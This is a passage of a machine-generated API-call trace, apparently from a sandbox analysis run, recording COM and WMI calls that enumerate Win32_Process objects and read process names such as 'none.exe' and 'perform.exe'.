CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0213.631] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0213.631] IUnknown:QueryInterface (in: This=0x560d310, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x560d310) returned 0x0 [0213.631] IUnknown:AddRef (This=0x560d310) returned 0x4 [0213.631] IUnknown:Release (This=0x560d310) returned 0x3 [0213.631] IUnknown:Release (This=0x560d310) returned 0x2 [0213.631] CoTaskMemFree (pv=0x5612508) [0213.631] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0213.631] IUnknown:AddRef (This=0x560d310) returned 0x3 [0213.631] IWbemClassObject:Get (in: This=0x560d310, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0213.632] IWbemClassObject:Get (in: This=0x560d310, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2444\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0213.632] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2444\"") returned 0x66 [0213.632] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2444\"") returned 0x66 [0213.632] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0213.632] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0213.632] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0213.632] IUnknown:Release (This=0x6d0cac) returned 0x1 [0213.633] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5612508) returned 0x0 [0213.633] WbemDefPath:IUnknown:QueryInterface (in: This=0x5612508, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0213.633] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5612508, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5619e80) returned 0x0 [0213.633] WbemDefPath:IUnknown:Release (This=0x5612508) returned 0x0 [0213.633] WbemDefPath:IUnknown:QueryInterface (in: This=0x5619e80, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5619e80) returned 0x0 [0213.634] WbemDefPath:IUnknown:QueryInterface (in: This=0x5619e80, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0213.634] WbemDefPath:IUnknown:AddRef (This=0x5619e80) returned 0x3 [0213.634] WbemDefPath:IUnknown:QueryInterface (in: This=0x5619e80, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0213.634] WbemDefPath:IUnknown:QueryInterface (in: This=0x5619e80, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0213.634] WbemDefPath:IUnknown:QueryInterface (in: This=0x5619e80, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5612518) returned 0x0 [0213.634] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5612518, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0213.634] WbemDefPath:IUnknown:Release (This=0x5612518) returned 0x3 [0213.634] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0213.634] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0213.634] WbemDefPath:IUnknown:QueryInterface (in: This=0x5619e80, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0213.634] WbemDefPath:IUnknown:Release (This=0x5619e80) returned 0x2 [0213.634] WbemDefPath:IUnknown:Release (This=0x5619e80) returned 0x1 [0213.634] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0213.634] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0213.634] WbemDefPath:IUnknown:QueryInterface (in: This=0x5619e80, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5619e80) returned 0x0 [0213.634] WbemDefPath:IUnknown:AddRef (This=0x5619e80) returned 0x3 [0213.635] WbemDefPath:IUnknown:Release (This=0x5619e80) returned 0x2 [0213.635] WbemDefPath:IWbemPath:SetText (This=0x5619e80, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2444\"") returned 0x0 [0213.635] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0213.635] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0213.635] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.635] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0213.635] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0213.635] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.635] IWbemClassObject:Get (in: This=0x560d310, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2685f3c*=0, plFlavor=0x2685f40*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="none.exe", varVal2=0x0), pType=0x2685f3c*=8, plFlavor=0x2685f40*=0) returned 0x0 [0213.635] SysStringByteLen (bstr="none.exe") returned 0x10 [0213.635] SysStringByteLen (bstr="none.exe") returned 0x10 [0213.635] IWbemClassObject:Get (in: This=0x560d310, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2685f3c*=8, plFlavor=0x2685f40*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="none.exe", varVal2=0x0), pType=0x2685f3c*=8, plFlavor=0x2685f40*=0) returned 0x0 [0213.635] SysStringByteLen (bstr="none.exe") returned 0x10 [0213.635] SysStringByteLen (bstr="none.exe") returned 0x10 [0213.635] CoTaskMemAlloc (cb=0x4) returned 0x5612548 [0213.635] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5612548, puReturned=0x267acc0 | out: apObjects=0x5612548*=0x560d4a8, puReturned=0x267acc0*=0x1) returned 0x0 [0213.636] IUnknown:QueryInterface (in: This=0x560d4a8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x560d4a8) returned 0x0 [0213.636] IUnknown:QueryInterface (in: This=0x560d4a8, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0213.637] IUnknown:QueryInterface (in: This=0x560d4a8, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0213.637] IUnknown:AddRef (This=0x560d4a8) returned 0x3 [0213.637] IUnknown:QueryInterface (in: This=0x560d4a8, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0213.637] IUnknown:QueryInterface (in: This=0x560d4a8, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0213.637] IUnknown:QueryInterface (in: This=0x560d4a8, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x560d4ac) returned 0x0 [0213.637] IMarshal:GetUnmarshalClass (in: This=0x560d4ac, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0213.637] IUnknown:Release (This=0x560d4ac) returned 0x3 [0213.637] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0213.637] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0213.637] IUnknown:QueryInterface (in: This=0x560d4a8, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0213.637] IUnknown:Release (This=0x560d4a8) returned 0x2 [0213.637] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0213.637] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0213.637] IUnknown:QueryInterface (in: This=0x560d4a8, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x560d4a8) returned 0x0 [0213.637] IUnknown:AddRef (This=0x560d4a8) returned 0x4 [0213.637] IUnknown:Release (This=0x560d4a8) returned 0x3 [0213.638] IUnknown:Release (This=0x560d4a8) returned 0x2 [0213.638] CoTaskMemFree (pv=0x5612548) [0213.638] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0213.638] IUnknown:AddRef (This=0x560d4a8) returned 0x3 [0213.638] IWbemClassObject:Get (in: This=0x560d4a8, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0213.638] IWbemClassObject:Get (in: This=0x560d4a8, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2456\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0213.638] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2456\"") returned 0x66 [0213.639] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2456\"") returned 0x66 [0213.639] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0213.639] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0213.639] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0213.639] IUnknown:Release (This=0x6d0cac) returned 0x1 [0213.640] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5612548) returned 0x0 [0213.640] WbemDefPath:IUnknown:QueryInterface (in: This=0x5612548, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0213.640] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5612548, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5619f60) returned 0x0 [0213.640] WbemDefPath:IUnknown:Release (This=0x5612548) returned 0x0 [0213.640] WbemDefPath:IUnknown:QueryInterface (in: This=0x5619f60, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5619f60) returned 0x0 [0213.640] WbemDefPath:IUnknown:QueryInterface (in: This=0x5619f60, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0213.640] WbemDefPath:IUnknown:AddRef (This=0x5619f60) returned 0x3 [0213.640] WbemDefPath:IUnknown:QueryInterface (in: This=0x5619f60, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0213.641] WbemDefPath:IUnknown:QueryInterface (in: This=0x5619f60, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0213.641] WbemDefPath:IUnknown:QueryInterface (in: This=0x5619f60, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5612558) returned 0x0 [0213.641] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5612558, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0213.641] WbemDefPath:IUnknown:Release (This=0x5612558) returned 0x3 [0213.641] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0213.641] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0213.641] WbemDefPath:IUnknown:QueryInterface (in: This=0x5619f60, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0213.641] WbemDefPath:IUnknown:Release (This=0x5619f60) returned 0x2 [0213.641] WbemDefPath:IUnknown:Release (This=0x5619f60) returned 0x1 [0213.641] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0213.641] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0213.641] WbemDefPath:IUnknown:QueryInterface (in: This=0x5619f60, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5619f60) returned 0x0 [0213.641] WbemDefPath:IUnknown:AddRef (This=0x5619f60) returned 0x3 [0213.641] WbemDefPath:IUnknown:Release (This=0x5619f60) returned 0x2 [0213.641] WbemDefPath:IWbemPath:SetText (This=0x5619f60, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2456\"") returned 0x0 [0213.641] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0213.641] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0213.641] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.642] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0213.642] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0213.642] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.642] IWbemClassObject:Get (in: This=0x560d4a8, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26867ac*=0, plFlavor=0x26867b0*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="perform.exe", varVal2=0x0), pType=0x26867ac*=8, plFlavor=0x26867b0*=0) returned 0x0 [0213.642] SysStringByteLen (bstr="perform.exe") returned 0x16 [0213.642] SysStringByteLen (bstr="perform.exe") returned 0x16 [0213.642] IWbemClassObject:Get (in: This=0x560d4a8, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26867ac*=8, plFlavor=0x26867b0*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="perform.exe", varVal2=0x0), pType=0x26867ac*=8, plFlavor=0x26867b0*=0) returned 0x0 [0213.642] SysStringByteLen (bstr="perform.exe") returned 0x16 [0213.642] SysStringByteLen (bstr="perform.exe") returned 0x16 [0213.642] CoTaskMemAlloc (cb=0x4) returned 0x5612588 [0213.642] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5612588, puReturned=0x267acc0 | out: apObjects=0x5612588*=0x560d640, puReturned=0x267acc0*=0x1) returned 0x0 [0213.719] IUnknown:QueryInterface (in: This=0x560d640, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x560d640) returned 0x0 [0213.719] IUnknown:QueryInterface (in: This=0x560d640, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0213.719] IUnknown:QueryInterface (in: This=0x560d640, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0213.719] IUnknown:AddRef (This=0x560d640) returned 0x3 [0213.719] IUnknown:QueryInterface (in: This=0x560d640, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0213.719] IUnknown:QueryInterface (in: This=0x560d640, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0213.719] IUnknown:QueryInterface (in: This=0x560d640, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x560d644) returned 0x0 [0213.720] IMarshal:GetUnmarshalClass (in: This=0x560d644, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, 